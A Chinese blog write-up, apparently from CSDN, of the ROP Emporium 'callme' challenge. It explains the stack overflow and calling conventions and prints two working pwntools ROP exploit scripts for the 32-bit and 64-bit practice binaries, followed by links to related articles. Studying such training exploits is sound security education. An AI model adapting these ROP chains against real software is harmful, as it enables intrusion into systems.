【rop emporium 2020】callme

最新推荐文章于 2022-05-10 09:39:57 发布
最新推荐文章于 2022-05-10 09:39:57 发布
阅读量532 收藏 1
点赞数 1
分类专栏: pwn 文章标签: rop
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013648063/article/details/113730521
版权

这篇博客主要是关于rop emporium(2020年7月的版本)的ret2win这道题的学习记录
因为网上都是比较早版本的题解,所以写了这篇博客,不过这道题倒是变化不大。
题目链接:https://ropemporium.com/challenge/callme.html
备注:以下题目都是在ubuntu16.04下完成

32位

这道题主要考逆向。
程序有个栈溢出漏洞,要利用这个漏洞按顺序执行call_one、call_two、call_three这三个函数。同时,这三个函数的参数可以从.so文件逆向得出来。(虽然题目也说了)
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
另外,需要注意的是我们要传入三个参数,所以需要手动模拟栈的操作,传完参数后需要pop 3次。所以需要找个pop3次,ret的gadget。
在这里插入图片描述
所以最后的exp是这样的:

from pwn import *
p = process("./callme32")
one_addr = 0x080484f0
two_addr = 0x08048550
three_addr = 0x080484e0
pop_ret = 0x080487f9
payload = "a" *44 + p32(one_addr)+p32(pop_ret) + p32(0xDEADBEEF)+p32(0xCAFEBABE)+p32(0xD00DF00D)
payload += p32(two_addr) + p32(pop_ret) + p32(0xDEADBEEF) + p32(0xCAFEBABE) + p32(0xD00DF00D)
payload += p32(three_addr) + p32(pop_ret) + p32(0xDEADBEEF) + p32(0xCAFEBABE) + p32(0xD00DF00D)
p.sendline(payload)
p.interactive()

最后运行结果:
在这里插入图片描述

64位

和前面一样,反汇编下call_one, call_two, call_three这三个函数。
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
和32位不一样的地方还是传参的地方。当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。
因为这次有三个参数,所以需要找有pop这三个寄存器rdi,rsi,rdx的gadget。
在这里插入图片描述

exp如下:

from pwn import *
p = process("./callme")
one_addr = 0x400720
two_addr = 0x400740
three_addr = 0x4006f0
pop_ret = 0x40093c
payload = "A" *40 + p64(pop_ret) + p64(0xDEADBEEFDEADBEEF)+p64(0xCAFEBABECAFEBABE)+p64(0xD00DF00DD00DF00D) + p64(one_addr)
payload += p64(pop_ret) + p64(0xDEADBEEFDEADBEEF)+p64(0xCAFEBABECAFEBABE)+p64(0xD00DF00DD00DF00D) + p64(two_addr)
payload += p64(pop_ret) + p64(0xDEADBEEFDEADBEEF)+p64(0xCAFEBABECAFEBABE)+p64(0xD00DF00DD00DF00D) + p64(three_addr)
p.sendline(payload)
p.interactive()

运行结果:
在这里插入图片描述
中间还遇到一个小问题,错把下面的offset当成call_one的地址了。
在这里插入图片描述
找到的过程是用gdb调试core文件发现的。看到这里说602040的地址是非法的。仔细检查了一下才发现搞错地址了。
在这里插入图片描述
总结:遇到问题多调试。

破落之实
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ROP Emporium一系列题
weixin_44296844的博客
12-21 460
Rop Emporium 最近在学习ROP,发现ROP Emporium这个网站上题目挺好,就一直在做,我这里用到查gadget的工具是ROPgadget,其他工具也是可以的。因为是直接从笔记上粘贴的,所以没有排版啥的,。。 ret2win_32 简单的覆盖返回地址跳转到后门函数 #coding="utf-8" from pwn import * sh=process("./ret2win3...
64位函数参数传递方式
热门推荐
qq_35467337的博客
03-08 1万+
64位函数传参方式
测试64位机器参数的传递
yldfree的博客
07-26 3719
在64位机器上参数的传递前6个 从左向右分别保存在rdi,rsi,rdx,rcx,r8和r9中,但是从第七个开始就要从又向左的入栈,如下图 在下面的例子中用嵌入式汇编的方式验证这正传参方式,前6个确实保存在rdi,rsi,rdx,rcx,r8和r9中如下输出结果: 但是64位架构中寄存器还存在很多如下: 那么第七个参数会不会在r10或之后的寄存器中保存呢,通过将第65行注释取消,...
ROP Emporium-callme
网安星空
01-06 412
ROP Emporium网站CTF相关PWN靶场callme,主要是PWN栈溢出中ROP技巧的练习
ROP_Emporium_callme
Starr
03-24 1213
文章目录1. split32信息收集黑盒测试反汇编调试分析Exp2. split参考文章 1. split32 信息收集 这个题提供了以下文件: callme32可执行程序 libcallme32.so动态库 key1.dat,key2.dat encrypted_flag.dat 不知道callme32格式那里不对,checksec会报错NameError: name 'dt_rpath' is not defined。一会黑盒测试如果崩溃了就说明有canary,而pie可以从入口点判断: $ rea
rop-emporium:新型Rop Emporium 2020回收箱的解决方案
02-14
ROP Emporium 20202020年7月更新的新 32位和64位bin的解决方案/编写。
Rompmporium漏洞:ROP Emporium漏洞
02-15
ROP Emporium开发 该存储库包含针对ROP Emporium挑战的漏洞利用程序。
rop轻松谈.pdf
10-21
rop基础
0001-TIPS-2020-hxp-kernel-rop : ret2user
06-19
0001-TIPS-2020-hxp-kernel-rop : ret2user
rop开放平台
04-12
rop开放平台s
rop emporium call me (x64)
u014377094的博客
02-10 1411
这道题惊喜点在于.so文件也可以拖到ida里逆向,服! 下面是题解过程: 左边发现奇怪的callme-one,two,three. 但是人家动态链接了,不知道内容是什么就无法利用,使用ida,把so文件拽里面 告诉我们,按这个参数就correctly了。 下面反倒过程平平无奇了 使用ROPgadget 找到三个参数的pop rdi rsi rdx ret 注意:当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。用栈时右到左,但6.
X64位-汇编语言-汇编补丁-参数传递-堆栈对齐
插件开发
05-10 1782
文章目录1.32位指令区别2.64位指令文件执行3.64位调用约定4.当调用子函数时,堆栈指针RSP必须在16字节边界对齐上5.子函数开始预留空间计算6.总结   进行任意软件的汇编补丁开发,需要对汇编语言有一定程度的了解,本人在补丁开发过程中,经常遇到各类问题,究其根本还是源于对汇编的一些规则了解不够,本文整理X64位汇编,为大家做参考。 1.32位指令区别   64位指令集是在32位指令集上的扩展和发展,EIP扩展为RIP,EFLAGS扩展为RFLAGS。浮点栈寄存器没有变化,多媒体寄存器多个8个寄存器
64位传参
北冥有鱼的Blog
03-08 2988
64位汇编当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。当参数为7个以上时, 前 6 个与前面一样, 但后面的依次从 “右向左” 放入栈中,即和32位汇编一样。参数个数大于 7 个的时候H(a, b, c, d, e, f, g, h);a->%rdi, b->%rsi, c->%rdx, d->%rcx, e->...
64位传参利用方法&LibcSearcher使用入门&ROPgadget利用
Carrot_kexin的博客
10-17 1075
ROP,需要通过puts函数泄露read函数地址,ROP时用puts函数的地址覆盖返回地址,用read函数的GOT表地址作为puts的参数传入。但是64位程序的函数传参是通过寄存器+堆栈的方式,因此无法直接通过栈溢出写入参数。解决方法是:在程序中寻找一处pop %rdi的指令,将数据写入rdi寄存器。 在程序中寻找pop %rdi需要一个叫ROPgadget的工具。 Linux指令: ROPgadget --binary pwn | grep "pop rdi" 查到在程序的0x400763地址处存在一个
linux64位系统下程序调用顺序
u014392567的博客
03-24 516
0x00 最近在学习缓冲区溢出,在开始阶段,一直没有弄懂相关资料中的溢出大小是怎么计算出来的,在自己摸索下,终于找到了一些线索。为了实现缓冲区攻击,我们得先知道程序在内存中的调用顺序,这样才能清楚缓冲区溢出的空间大小。0X01:基本知识1、在操作系统中,地址有三种:逻辑地址、线性地址、物理地址。 逻辑地址:是指是包含在机器语言中用来指定 一个操作数或一条指令的地址;在采用分段机制的内存中,逻辑地
x86传参ABI
一点点
09-02 1071
32位模式下通过栈传参; 64位模式下前6个参数通过寄存器传参,6个以上的参数通过栈传参; 寄存器使用的顺序为: %rdi:第1个参数; %rsi:第2个参数; %rdx:第3个参数; %rcx:第4个参数; %r8:第5个参数; %r9:第6个参数; 特殊用法fastcall fastcall调用约定和stdcall类似,它意味着: 函数的第一个和第二个DWORD参数(或者尺寸更小的)通过ecx...
ROPEmporium通关全解(三)
Yale的博客
12-24 376
前言 1.关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等) ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 2. 本系列rop实战题目的背景 来自ROPEmporium...
ROP Emporium-split
网安星空
01-05 361
ROP Emporium是一个通过一系列的挑战来学习ROP的网站,ROP常用于PWN的场景,是CTF的必备技能
ROP_Emporium_split
Starr
03-24 243
文章目录1. split32信息收集黑盒测试反汇编Exp调试分析2. split黑盒测试反汇编Exp参考文章 1. split32 信息收集 $ file split32 split32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=76cb700a2ac0484f
pwnyools ROP模块
最新发布
08-25
ROP (Return-Oriented Programming) 是一种利用现有程序中已存在的代码片段来构造恶意代码执行的技术。pwnyools 是一个 Python 库,它提供了一些用于创建和利用 ROP 载荷的工具。 pwnyools 的 ROP 模块包含了一些...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

破落之实

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值